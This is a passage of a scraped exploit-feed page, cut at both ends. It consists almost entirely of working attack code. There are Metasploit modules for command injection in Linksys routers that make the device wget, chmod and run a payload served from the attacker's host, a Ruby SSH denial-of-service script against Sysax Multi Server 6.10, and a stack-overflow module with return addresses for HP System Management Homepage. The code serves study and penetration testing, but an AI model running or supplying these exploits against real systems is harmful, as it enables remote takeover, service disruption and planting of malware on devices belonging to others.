@lan_ipaddr_orig = get_config(res.body, "<input\ type=hidden\ name=\"lan_ipaddr\"\ value=(.*)>") @wait_time_orig = get_config(res.body, "<input\ type=hidden\ name=\"wait_time\"\ value=(.*)>") @need_reboot_orig = get_config(res.body, "<input\ type=hidden\ name=\"need_reboot\"\ value=(.*)>") @lan_ipaddr_0_orig = get_config(res.body, "onBlur\=valid_range\\(this\,1\,223\,\"IP\"\\)\ size=3\ value=\'(.*)\'\ name=\"lan_ipaddr_0\"\>") @lan_ipaddr_1_orig = get_config(res.body, "\<INPUT\ class=num\ maxLength=3\ 
onBlur=valid_range\\(this\,0\,255\,\"IP\"\\)\ size=3\ value=\'(.*)\'\ name=\"lan_ipaddr_1\">") @lan_ipaddr_2_orig = get_config(res.body, "\<INPUT\ class=num maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"IP\"\\)\ size=3\ value=\'(.*)\'\ name=\"lan_ipaddr_2\">") @lan_ipaddr_3_orig = get_config(res.body, "<INPUT class=num maxLength=3\ onBlur=\"valid_range\\(this,1,254,'IP'\\)\;Sel_SubMask\\(this.form.lan_netmask,this.form\\);\"\ size=3" << "\ value='(.*)'\ name=\"lan_ipaddr_3\"><\/TD>") @router_name_orig = get_config(res.body, "name=\"router_name\"\ size=\"20\"\ value=\'(.*)\'\ onBlur=valid_name\\(this\,\"Router%20Name\"\\)><\/FONT><\/TD>") @wan_domain_orig = get_config(res.body, "name=\"wan_domain\"\ size=\"20\"\ value=\'(.*)\'\ onBlur=valid_name\\(this\,\"Domain%20name\"\,SPACE_NO\\)><\/FONT><\/TD>") @wan_hostname_orig = get_config(res.body, "<INPUT\ maxLength=39\ name=\"wan_hostname\"\ size=\"20\"\ value=\'(.*)\'\ onBlur=valid_name\\(this\,\"Host%20Name\"\\)><\/FONT><\/TD>") @wan_mtu_orig = get_config(res.body, "<INPUT\ class=num\ maxLength=4\ onBlur=valid_mtu\\(this\\)\ size=5\ value='(.*)'\ name=\"wan_mtu\"><\/TD>") if @wan_mtu_orig.to_i > 1500 @mtu_enable = "0" end @ui_language_orig = get_config(res.body, "<SCRIPT\ language=\"Javascript\"\ type=\"text\/javascript\" src=\"(.*)_lang_pack\/capsec.js\"><\/SCRIPT>") @dhcp_lease_orig = get_config(res.body, "<INPUT\ maxLength=4\ onBlur=valid_range\\(this\,0\,9999\,\"DHCP%20Lease%20Time\"\\)\ size=4\ value=\'(.*)\'\ name=\"dhcp_lease\"\ class=num") @dhcp_num_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,1\,253\,\"Number%20of%20DHCP%20users\"\\)\;Sel_SubMask_onblur\\(this.form.lan_netmask\,this.form\\)" << "\ size=3\ value=\'(.*)\'\ name=\"dhcp_num\"\ class=num><\/TD>") @dhcp_start_orig = get_config(res.body, "Sel_SubMask_onblur\\(this.form.lan_netmask\,this.form\\)\ size=3\ value=\'(.*)\'\ name=\"dhcp_start\"\ class=num\ " << "onChange=\"valid_dhcpd_start_ip\\(this.form\,\ this\\)\">") 
@netmask_orig = get_config(res.body, "value=.*\ selected\>255\.255\.255\.(.*)\<\/OPTION\>") @wan_dns_orig = get_config(res.body, "<input\ type=hidden\ name=wan_dns\ value=(.*)><INPUT\ maxLength=3") @wan_dns0_0_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,223\,\"DNS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_dns0_0\"\ class=num\>") @wan_dns0_1_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"DNS\"\\)\ size=3\ value=\'(.*)\' name=\"wan_dns0_1\"\ class=num\>") @wan_dns0_2_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"DNS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_dns0_2\"\ class=num\>") @wan_dns0_3_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,254\,\"DNS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_dns0_3\"\ class=num\>") @wan_dns1_0_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,223\,\"DNS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_dns1_0\"\ class=num\>") @wan_dns1_1_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"DNS\"\\)\ size=3\ value=\'(.*)\' name=\"wan_dns1_1\"\ class=num\>") @wan_dns1_2_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"DNS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_dns1_2\"\ class=num\>") @wan_dns1_3_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,254\,\"DNS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_dns1_3\"\ class=num\>") @wan_dns2_0_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,223\,\"DNS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_dns2_0\"\ class=num\>") @wan_dns2_1_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"DNS\"\\)\ size=3\ value=\'(.*)\' name=\"wan_dns2_1\"\ class=num\>") @wan_dns2_2_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"DNS\"\\)\ size=3\ 
value=\'(.*)\'\ name=\"wan_dns2_2\"\ class=num\>") @wan_dns2_3_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,254\,\"DNS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_dns2_3\"\ class=num\>") @wan_wins_orig = get_config(res.body, "<input\ type=hidden\ name=wan_wins\ value=(.*)><INPUT\ maxLength=3") @wan_wins_0_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,223\,\"WINS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_wins_0\"\ class=num>") @wan_wins_1_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"WINS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_wins_1\"\ class=num>") @wan_wins_2_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"WINS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_wins_2\"\ class=num>") @wan_wins_3_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,254\,\"WINS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_wins_3\"\ class=num>") end def restore_conf(user,pass,uri) # we have used most parts of the original configuration # just need to restore wan_hostname cmd = @wan_hostname_orig.to_s print_status("#{rhost}:#{rport} - Asking the Linksys device to reload original configuration") res = request(cmd,user,pass,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to reload original configuration") end #the device needs around 10 seconds to apply our current configuration print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration") select(nil, nil, nil, @timeout) end def request(cmd,user,pass,uri) begin res = send_request_cgi({ 'uri' => uri, 'method' => 'POST', 'authorization' => basic_auth(user,pass), 'encode_params' => false, 'vars_post' => { 'submit_button' => "index", 'change_action' => "1", 'submit_type' => "1", 'action' => "Apply", 'now_proto' => @now_proto_orig.to_s, 'daylight_time' => @daylight_time_orig.to_s, 'lan_ipaddr' => @lan_ipaddr_orig.to_s, 
'wait_time' => @wait_time_orig.to_s, 'need_reboot' => @need_reboot_orig.to_s, 'ui_language' => @ui_language_orig, 'wan_proto' => @wan_proto_orig.to_s, 'router_name' => @router_name_orig.to_s, 'wan_hostname' => cmd, 'wan_domain' => @wan_domain_orig.to_s, 'mtu_enable' => @mtu_enable.to_s, 'wan_mtu' => @wan_mtu_orig.to_s, 'lan_ipaddr_0' => @lan_ipaddr_0_orig.to_s, 'lan_ipaddr_1' => @lan_ipaddr_1_orig.to_s, 'lan_ipaddr_2' => @lan_ipaddr_2_orig.to_s, 'lan_ipaddr_3' => @lan_ipaddr_3_orig.to_s, 'lan_netmask' => "255.255.255.#{@netmask_orig}", 'lan_proto' => @lan_proto_orig.to_s, 'dhcp_check' => "1", 'dhcp_start' => @dhcp_start_orig.to_s, 'dhcp_num' => @dhcp_num_orig.to_s, 'dhcp_lease' => @dhcp_lease_orig.to_s, 'wan_dns' => @wan_dns_orig.to_s, 'wan_dns0_0' => @wan_dns0_0_orig.to_s, 'wan_dns0_1' => @wan_dns0_1_orig.to_s, 'wan_dns0_2' => @wan_dns0_2_orig.to_s, 'wan_dns0_3' => @wan_dns0_3_orig.to_s, 'wan_dns1_0' => @wan_dns1_0_orig.to_s, 'wan_dns1_1' => @wan_dns1_1_orig.to_s, 'wan_dns1_2' => @wan_dns1_2_orig.to_s, 'wan_dns1_3' => @wan_dns1_3_orig.to_s, 'wan_dns2_0' => @wan_dns2_0_orig.to_s, 'wan_dns2_1' => @wan_dns2_1_orig.to_s, 'wan_dns2_2' => @wan_dns2_2_orig.to_s, 'wan_dns2_3' => @wan_dns2_3_orig.to_s, 'wan_wins' => @wan_wins_orig.to_s, 'wan_wins_0' => @wan_wins_0_orig.to_s, 'wan_wins_1' => @wan_wins_1_orig.to_s, 'wan_wins_2' => @wan_wins_2_orig.to_s, 'wan_wins_3' => @wan_wins_3_orig.to_s, 'time_zone' => "-08+1+1", #default is ok '_daylight_time' => '1' #default is ok } }) return res rescue ::Rex::ConnectionError vprint_error("#{rhost} - Failed to connect to the web server") return nil end end def exploit downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8)) uri = '/apply.cgi' user = datastore['USERNAME'] pass = datastore['PASSWORD'] rhost = datastore['RHOST'] rport = datastore['RPORT'] restore = datastore['RESTORE_CONF'] @timeout = 10 # # testing Login # print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}") begin res = send_request_cgi({ 
'uri' => uri, 'method' => 'GET', 'authorization' => basic_auth(user,pass) }) if res.nil? or res.code == 404 fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") end if 200, 301,.include?(res.code) print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}") else fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") end rescue ::Rex::ConnectionError fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server") end grab_config(user,pass) if target.name =~ /CMD/ if not (datastore['CMD']) fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible") end cmd = payload.encoded cmd = "`#{cmd}`" res = request(cmd,user,pass,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") else print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state") end print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration") select(nil, nil, nil, @timeout) restore_conf(user,pass,uri) if restore return end #thx to Juan for his awesome work on the mipsel elf support @pl = generate_payload_exe @elf_sent = false # # start our server # resource_uri = '/' + downfile if (datastore['DOWNHOST']) service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri else #do not use SSL if datastore['SSL'] ssl_restore = true datastore['SSL'] = false end #we use SRVHOST as download IP for the coming wget command. 
#SRVHOST needs a real IP address of our download host if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::") srv_host = Rex::Socket.source_address(rhost) else srv_host = datastore['SRVHOST'] end service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...") start_service({'Uri' => { 'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) }, 'Path' => resource_uri }}) datastore['SSL'] = true if ssl_restore end # # download payload # print_status("#{rhost}:#{rport} - Asking the Linksys device to download #{service_url}") #this filename is used to store the payload on the device filename = rand_text_alpha_lower(8) #not working if we send all command together -> lets take three requests cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}" cmd = "`#{cmd}`" res = request(cmd,user,pass,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") end # wait for payload download if (datastore['DOWNHOST']) #waiting some time so we could be sure that the device got the payload from our third party server print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the Linksys device to download the payload") select(nil, nil, nil, datastore['HTTP_DELAY']) else wait_linux_payload end register_file_for_cleanup("/tmp/#{filename}") # # chmod # cmd = "chmod 777 /tmp/#{filename}" cmd = "`#{cmd}`" print_status("#{rhost}:#{rport} - Asking the Linksys device to chmod #{downfile}") res = request(cmd,user,pass,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") end print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration") select(nil, nil, nil, @timeout) # # execute # cmd = "/tmp/#{filename}" cmd = "`#{cmd}`" print_status("#{rhost}:#{rport} - Asking the Linksys device to execute #{downfile}") res = 
request(cmd,user,pass,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") end print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration") select(nil, nil, nil, @timeout) # #reload original configuration # if restore restore_conf(user,pass,uri) end end # Handle incoming requests from the server def on_request_uri(cli, request) #print_status("on_request_uri called: #{request.inspect}") if (not @pl) print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!") return end print_status("#{rhost}:#{rport} - Sending the payload to the server...") @elf_sent = true send_response(cli, @pl) end # wait for the data to be sent def wait_linux_payload print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...") waited = 0 while (not @elf_sent) select(nil, nil, nil, 1) waited += 1 if (waited > datastore['HTTP_DELAY']) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Target didn't request the ELF payload -- Maybe it can't connect back to us?") end end end

==> Sysax Multi Server 6.10 - SSH DoS Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss #!/usr/bin/env ruby # Sysax Multi Server 6.10 SSH DoS # Matt "hostess" Andreko < mandreko [at] accuvant.com > # http://www.mattandreko.com/2013/04/sysax-multi-server-610-ssh-dos.html require 'socket' unless ARGV.length == 2 puts "Usage: ruby #{$0} [host] [port]\n" exit end packet = [0x00, 0x00, 0x03, 0x14, 0x08, 0x14, 0xff, 0x9f, 0xde, 0x5d, 0x5f, 0xb3, 0x07, 0x8f, 0x49, 0xa7, 0x79, 0x6a, 0x03, 0x3d, 0xaf, 0x55, 0x00, 0x00, 0x00, 0x7e, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x2d, 0x65, 0x78, 0x63, 0x68, 0x61, 0x6e, 0x67, 0x65, 0x2d, 0x73, 0x68, 0x61, 0x32, 0x35, 0x36, 0x2c, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x2d, 0x65, 0x78, 0x63, 0x68, 0x61, 0x6e, 0x67, 0x65, 0x2d, 0x73, 0x68, 0x61, 0x31, 0x2c, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x31, 0x34, 0x2d, 0x73, 0x68, 0x61, 0x31, 0x2c, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x31, 0x2d, 0x73, 0x68, 0x61, 0x31, 0x00, 0x00, 0x00, 0x0f, 0x73, 0x73, 0x68, 0x2d, 0x72, 0x73, 0x61, 0x2c, 0x73, 0x73, 0x68, 0x2d, 0x64, 0x73, 0x73, 0x00, 0x00, 0x00, 0x9d, 0x61, 0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x62, 0x6c, 0x6f, 0x77, 0x66, 0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x63, 0x61, 0x73, 0x74, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x32, 0x35, 0x36, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x72, 0x69, 0x6a, 0x6e, 0x64, 
0x61, 0x65, 0x6c, 0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79, 0x73, 0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69, 0x75, 0x2e, 0x73, 0x65, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63, 0x74, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35, 0x36, 0x2d, 0x63, 0x74, 0x72, 0x00, 0x00, 0x00, 0x9d, 0x61, 0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x62, 0x6c, 0x6f, 0x77, 0x66, 0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x63, 0x61, 0x73, 0x74, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x32, 0x35, 0x36, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x72, 0x69, 0x6a, 0x6e, 0x64, 0x61, 0x65, 0x6c, 0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79, 0x73, 0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69, 0x75, 0x2e, 0x73, 0x65, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63, 0x74, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35, 0x36, 0x2d, 0x63, 0x74, 0x72, 0x00, 0x00, 0x00, 0x69, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31, 0x2c, 0x75, 0x6d, 0x61, 0x63, 0x2d, 0x36, 0x34, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64, 0x31, 0x36, 0x30, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64, 0x31, 0x36, 0x30, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31, 0x2d, 0x39, 0x36, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2d, 0x39, 0x36, 0x00, 0x00, 0x00, 0x69, 0x68, 0x6d, 0x61, 0x63, 
0x2d, 0x6d, 0x64, 0x35, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31, 0x2c, 0x75, 0x6d, 0x61, 0x63, 0x2d, 0x36, 0x34, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64, 0x31, 0x36, 0x30, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64, 0x31, 0x36, 0x30, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31, 0x2d, 0x39, 0x36, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2d, 0x39, 0x36, 0x00, #3rd byte in this next line causes crash 0x00, 0x00, 0x28, 0x7a, 0x6c, 0x69, 0x62, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x7a, 0x6c, 0x69, 0x62, 0x2c, 0x6e, 0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00, 0x1a, 0x7a, 0x6c, 0x69, 0x62, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x7a, 0x6c, 0x69, 0x62, 0x2c, 0x6e, 0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00].pack("C*") host = ARGV[0] port = ARGV[1] sock = TCPSocket.open(host, port) banner = sock.gets() puts banner sock.puts("SSH-2.0-OpenSSH_5.1p1 Debian-5ubuntu1\r\n") sock.puts(packet) resp = sock.gets()

==> HP System Management Anonymous Access Code Execution Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking HttpFingerprint = { :pattern => [ /HP System Management Homepage/ ] } include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'HP System Management Anonymous Access Code Execution', 'Description' => %q{ This module exploits an anonymous remote code execution on HP System Management 7.1.1 and earlier. The vulnerability exists when handling the iprange parameter on a request against /proxy/DataValidation. In order to work HP System Management must be configured with Anonymous access enabled. }, 'Author' => [ 'agix' ], # @agixid 'License' => MSF_LICENSE, 'Payload' => { 'DisableNops' => true, 'Space' => 1000, 'BadChars' => "\x00\x25\x0a\x0b\x0d\x3a\x3b\x09\x0c\x23\x20", 'EncoderOptions' => { 'BufferRegister' => 'ESP' # See the comments below } }, 'Platform' => ['linux'], 'Arch' => ARCH_X86, 'References' => [ ['OSVDB', '91812'] ], 'Targets' => [ [ 'HP System Management 7.1.1 - Linux (CentOS)', { 'Ret' => 0x8054e14, # push esp / ret 'Offset' => 267 } ], [ 'HP System Management 6.3.0 - Linux (CentOS)', { 'Ret' => 0x805a547, # push esp / ret 'Offset' => 267 } ] ], 'DisclosureDate' => 'Sep 01 2012', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(2381), OptBool.new('SSL', true, 'Use SSL',) ], self.class) end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => "/cpqlogin.htm" }) if res and res.code == 200 and res.body =~ /"HP System Management Homepage v(.*)"/ version = $1 return Exploit::CheckCode::Vulnerable if version <= "7.1.1.1" end return Exploit::CheckCode::Safe end def exploit padding = rand_text_alpha(target['Offset']) ret = 
[target['Ret']].pack('V') iprange = "a-bz"+padding+ret+payload.encoded print_status("#{rhost}:#{rport} - Sending exploit...") res = send_request_cgi({ 'method' => 'GET', 'uri' => "/proxy/DataValidation", 'encode_params' => false, 'vars_get' => { 'iprange' => iprange } }) end

==> Linksys E1500/E2500 apply.cgi Remote Command Injection Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Linksys E1500/E2500 apply.cgi Remote Command Injection', 'Description' => %q{ Some Linksys Routers are vulnerable to an authenticated OS command injection. Default credentials for the web interface are admin/admin or admin/password. Since it is a blind os command injection vulnerability, there is no output for the executed command when using the cmd generic payload. A ping command against a controlled system could be used for testing purposes. 
}, 'Author' => [ 'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module 'juan vazquez' # minor help with msf module ], 'License' => MSF_LICENSE, 'References' => [ [ 'BID', '57760' ], [ 'EDB', '24475' ], [ 'OSVDB', '89912' ], [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-004' ] ], 'DisclosureDate' => 'Feb 05 2013', 'Privileged' => true, 'Platform' => ['linux','unix'], 'Payload' => { 'DisableNops' => true }, 'Targets' => [ [ 'CMD', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ], [ 'Linux mipsel Payload', { 'Arch' => ARCH_MIPSLE, 'Platform' => 'linux' } ], ], 'DefaultTarget' => 1, )) register_options( [ OptString.new('USERNAME', [ true, 'The username to authenticate as', 'admin' ]), OptString.new('PASSWORD', [ true, 'The password for the specified username', 'admin' ]), OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]), OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]), OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60]) ], self.class) end def request(cmd,user,pass,uri) begin res = send_request_cgi({ 'uri' => uri, 'method' => 'POST', 'authorization' => basic_auth(user,pass), 'vars_post' => { "submit_button" => "Diagnostics", "change_action" => "gozila_cgi", "submit_type" => "start_ping", "action" => "", "commit" => "0", "ping_ip" => "1.1.1.1", "ping_size" => "&#{cmd}&", "ping_times" => "5", "traceroute_ip" => "" } }) return res rescue ::Rex::ConnectionError vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") return nil end end def exploit downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8)) uri = '/apply.cgi' user = datastore['USERNAME'] pass = datastore['PASSWORD'] rhost = datastore['RHOST'] rport = datastore['RPORT'] # # testing Login # print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}") begin res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', 
'authorization' => basic_auth(user,pass) }) if res.nil? or res.code == 404 fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") end if 200, 301,.include?(res.code) print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}") else fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") end rescue ::Rex::ConnectionError fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server") end if target.name =~ /CMD/ if not (datastore['CMD']) fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible") end cmd = payload.encoded res = request(cmd,user,pass,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") else print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state") end return end #thx to Juan for his awesome work on the mipsel elf support @pl = generate_payload_exe @elf_sent = false # # start our server # resource_uri = '/' + downfile if (datastore['DOWNHOST']) service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri else #do not use SSL if datastore['SSL'] ssl_restore = true datastore['SSL'] = false end #we use SRVHOST as download IP for the coming wget command. 
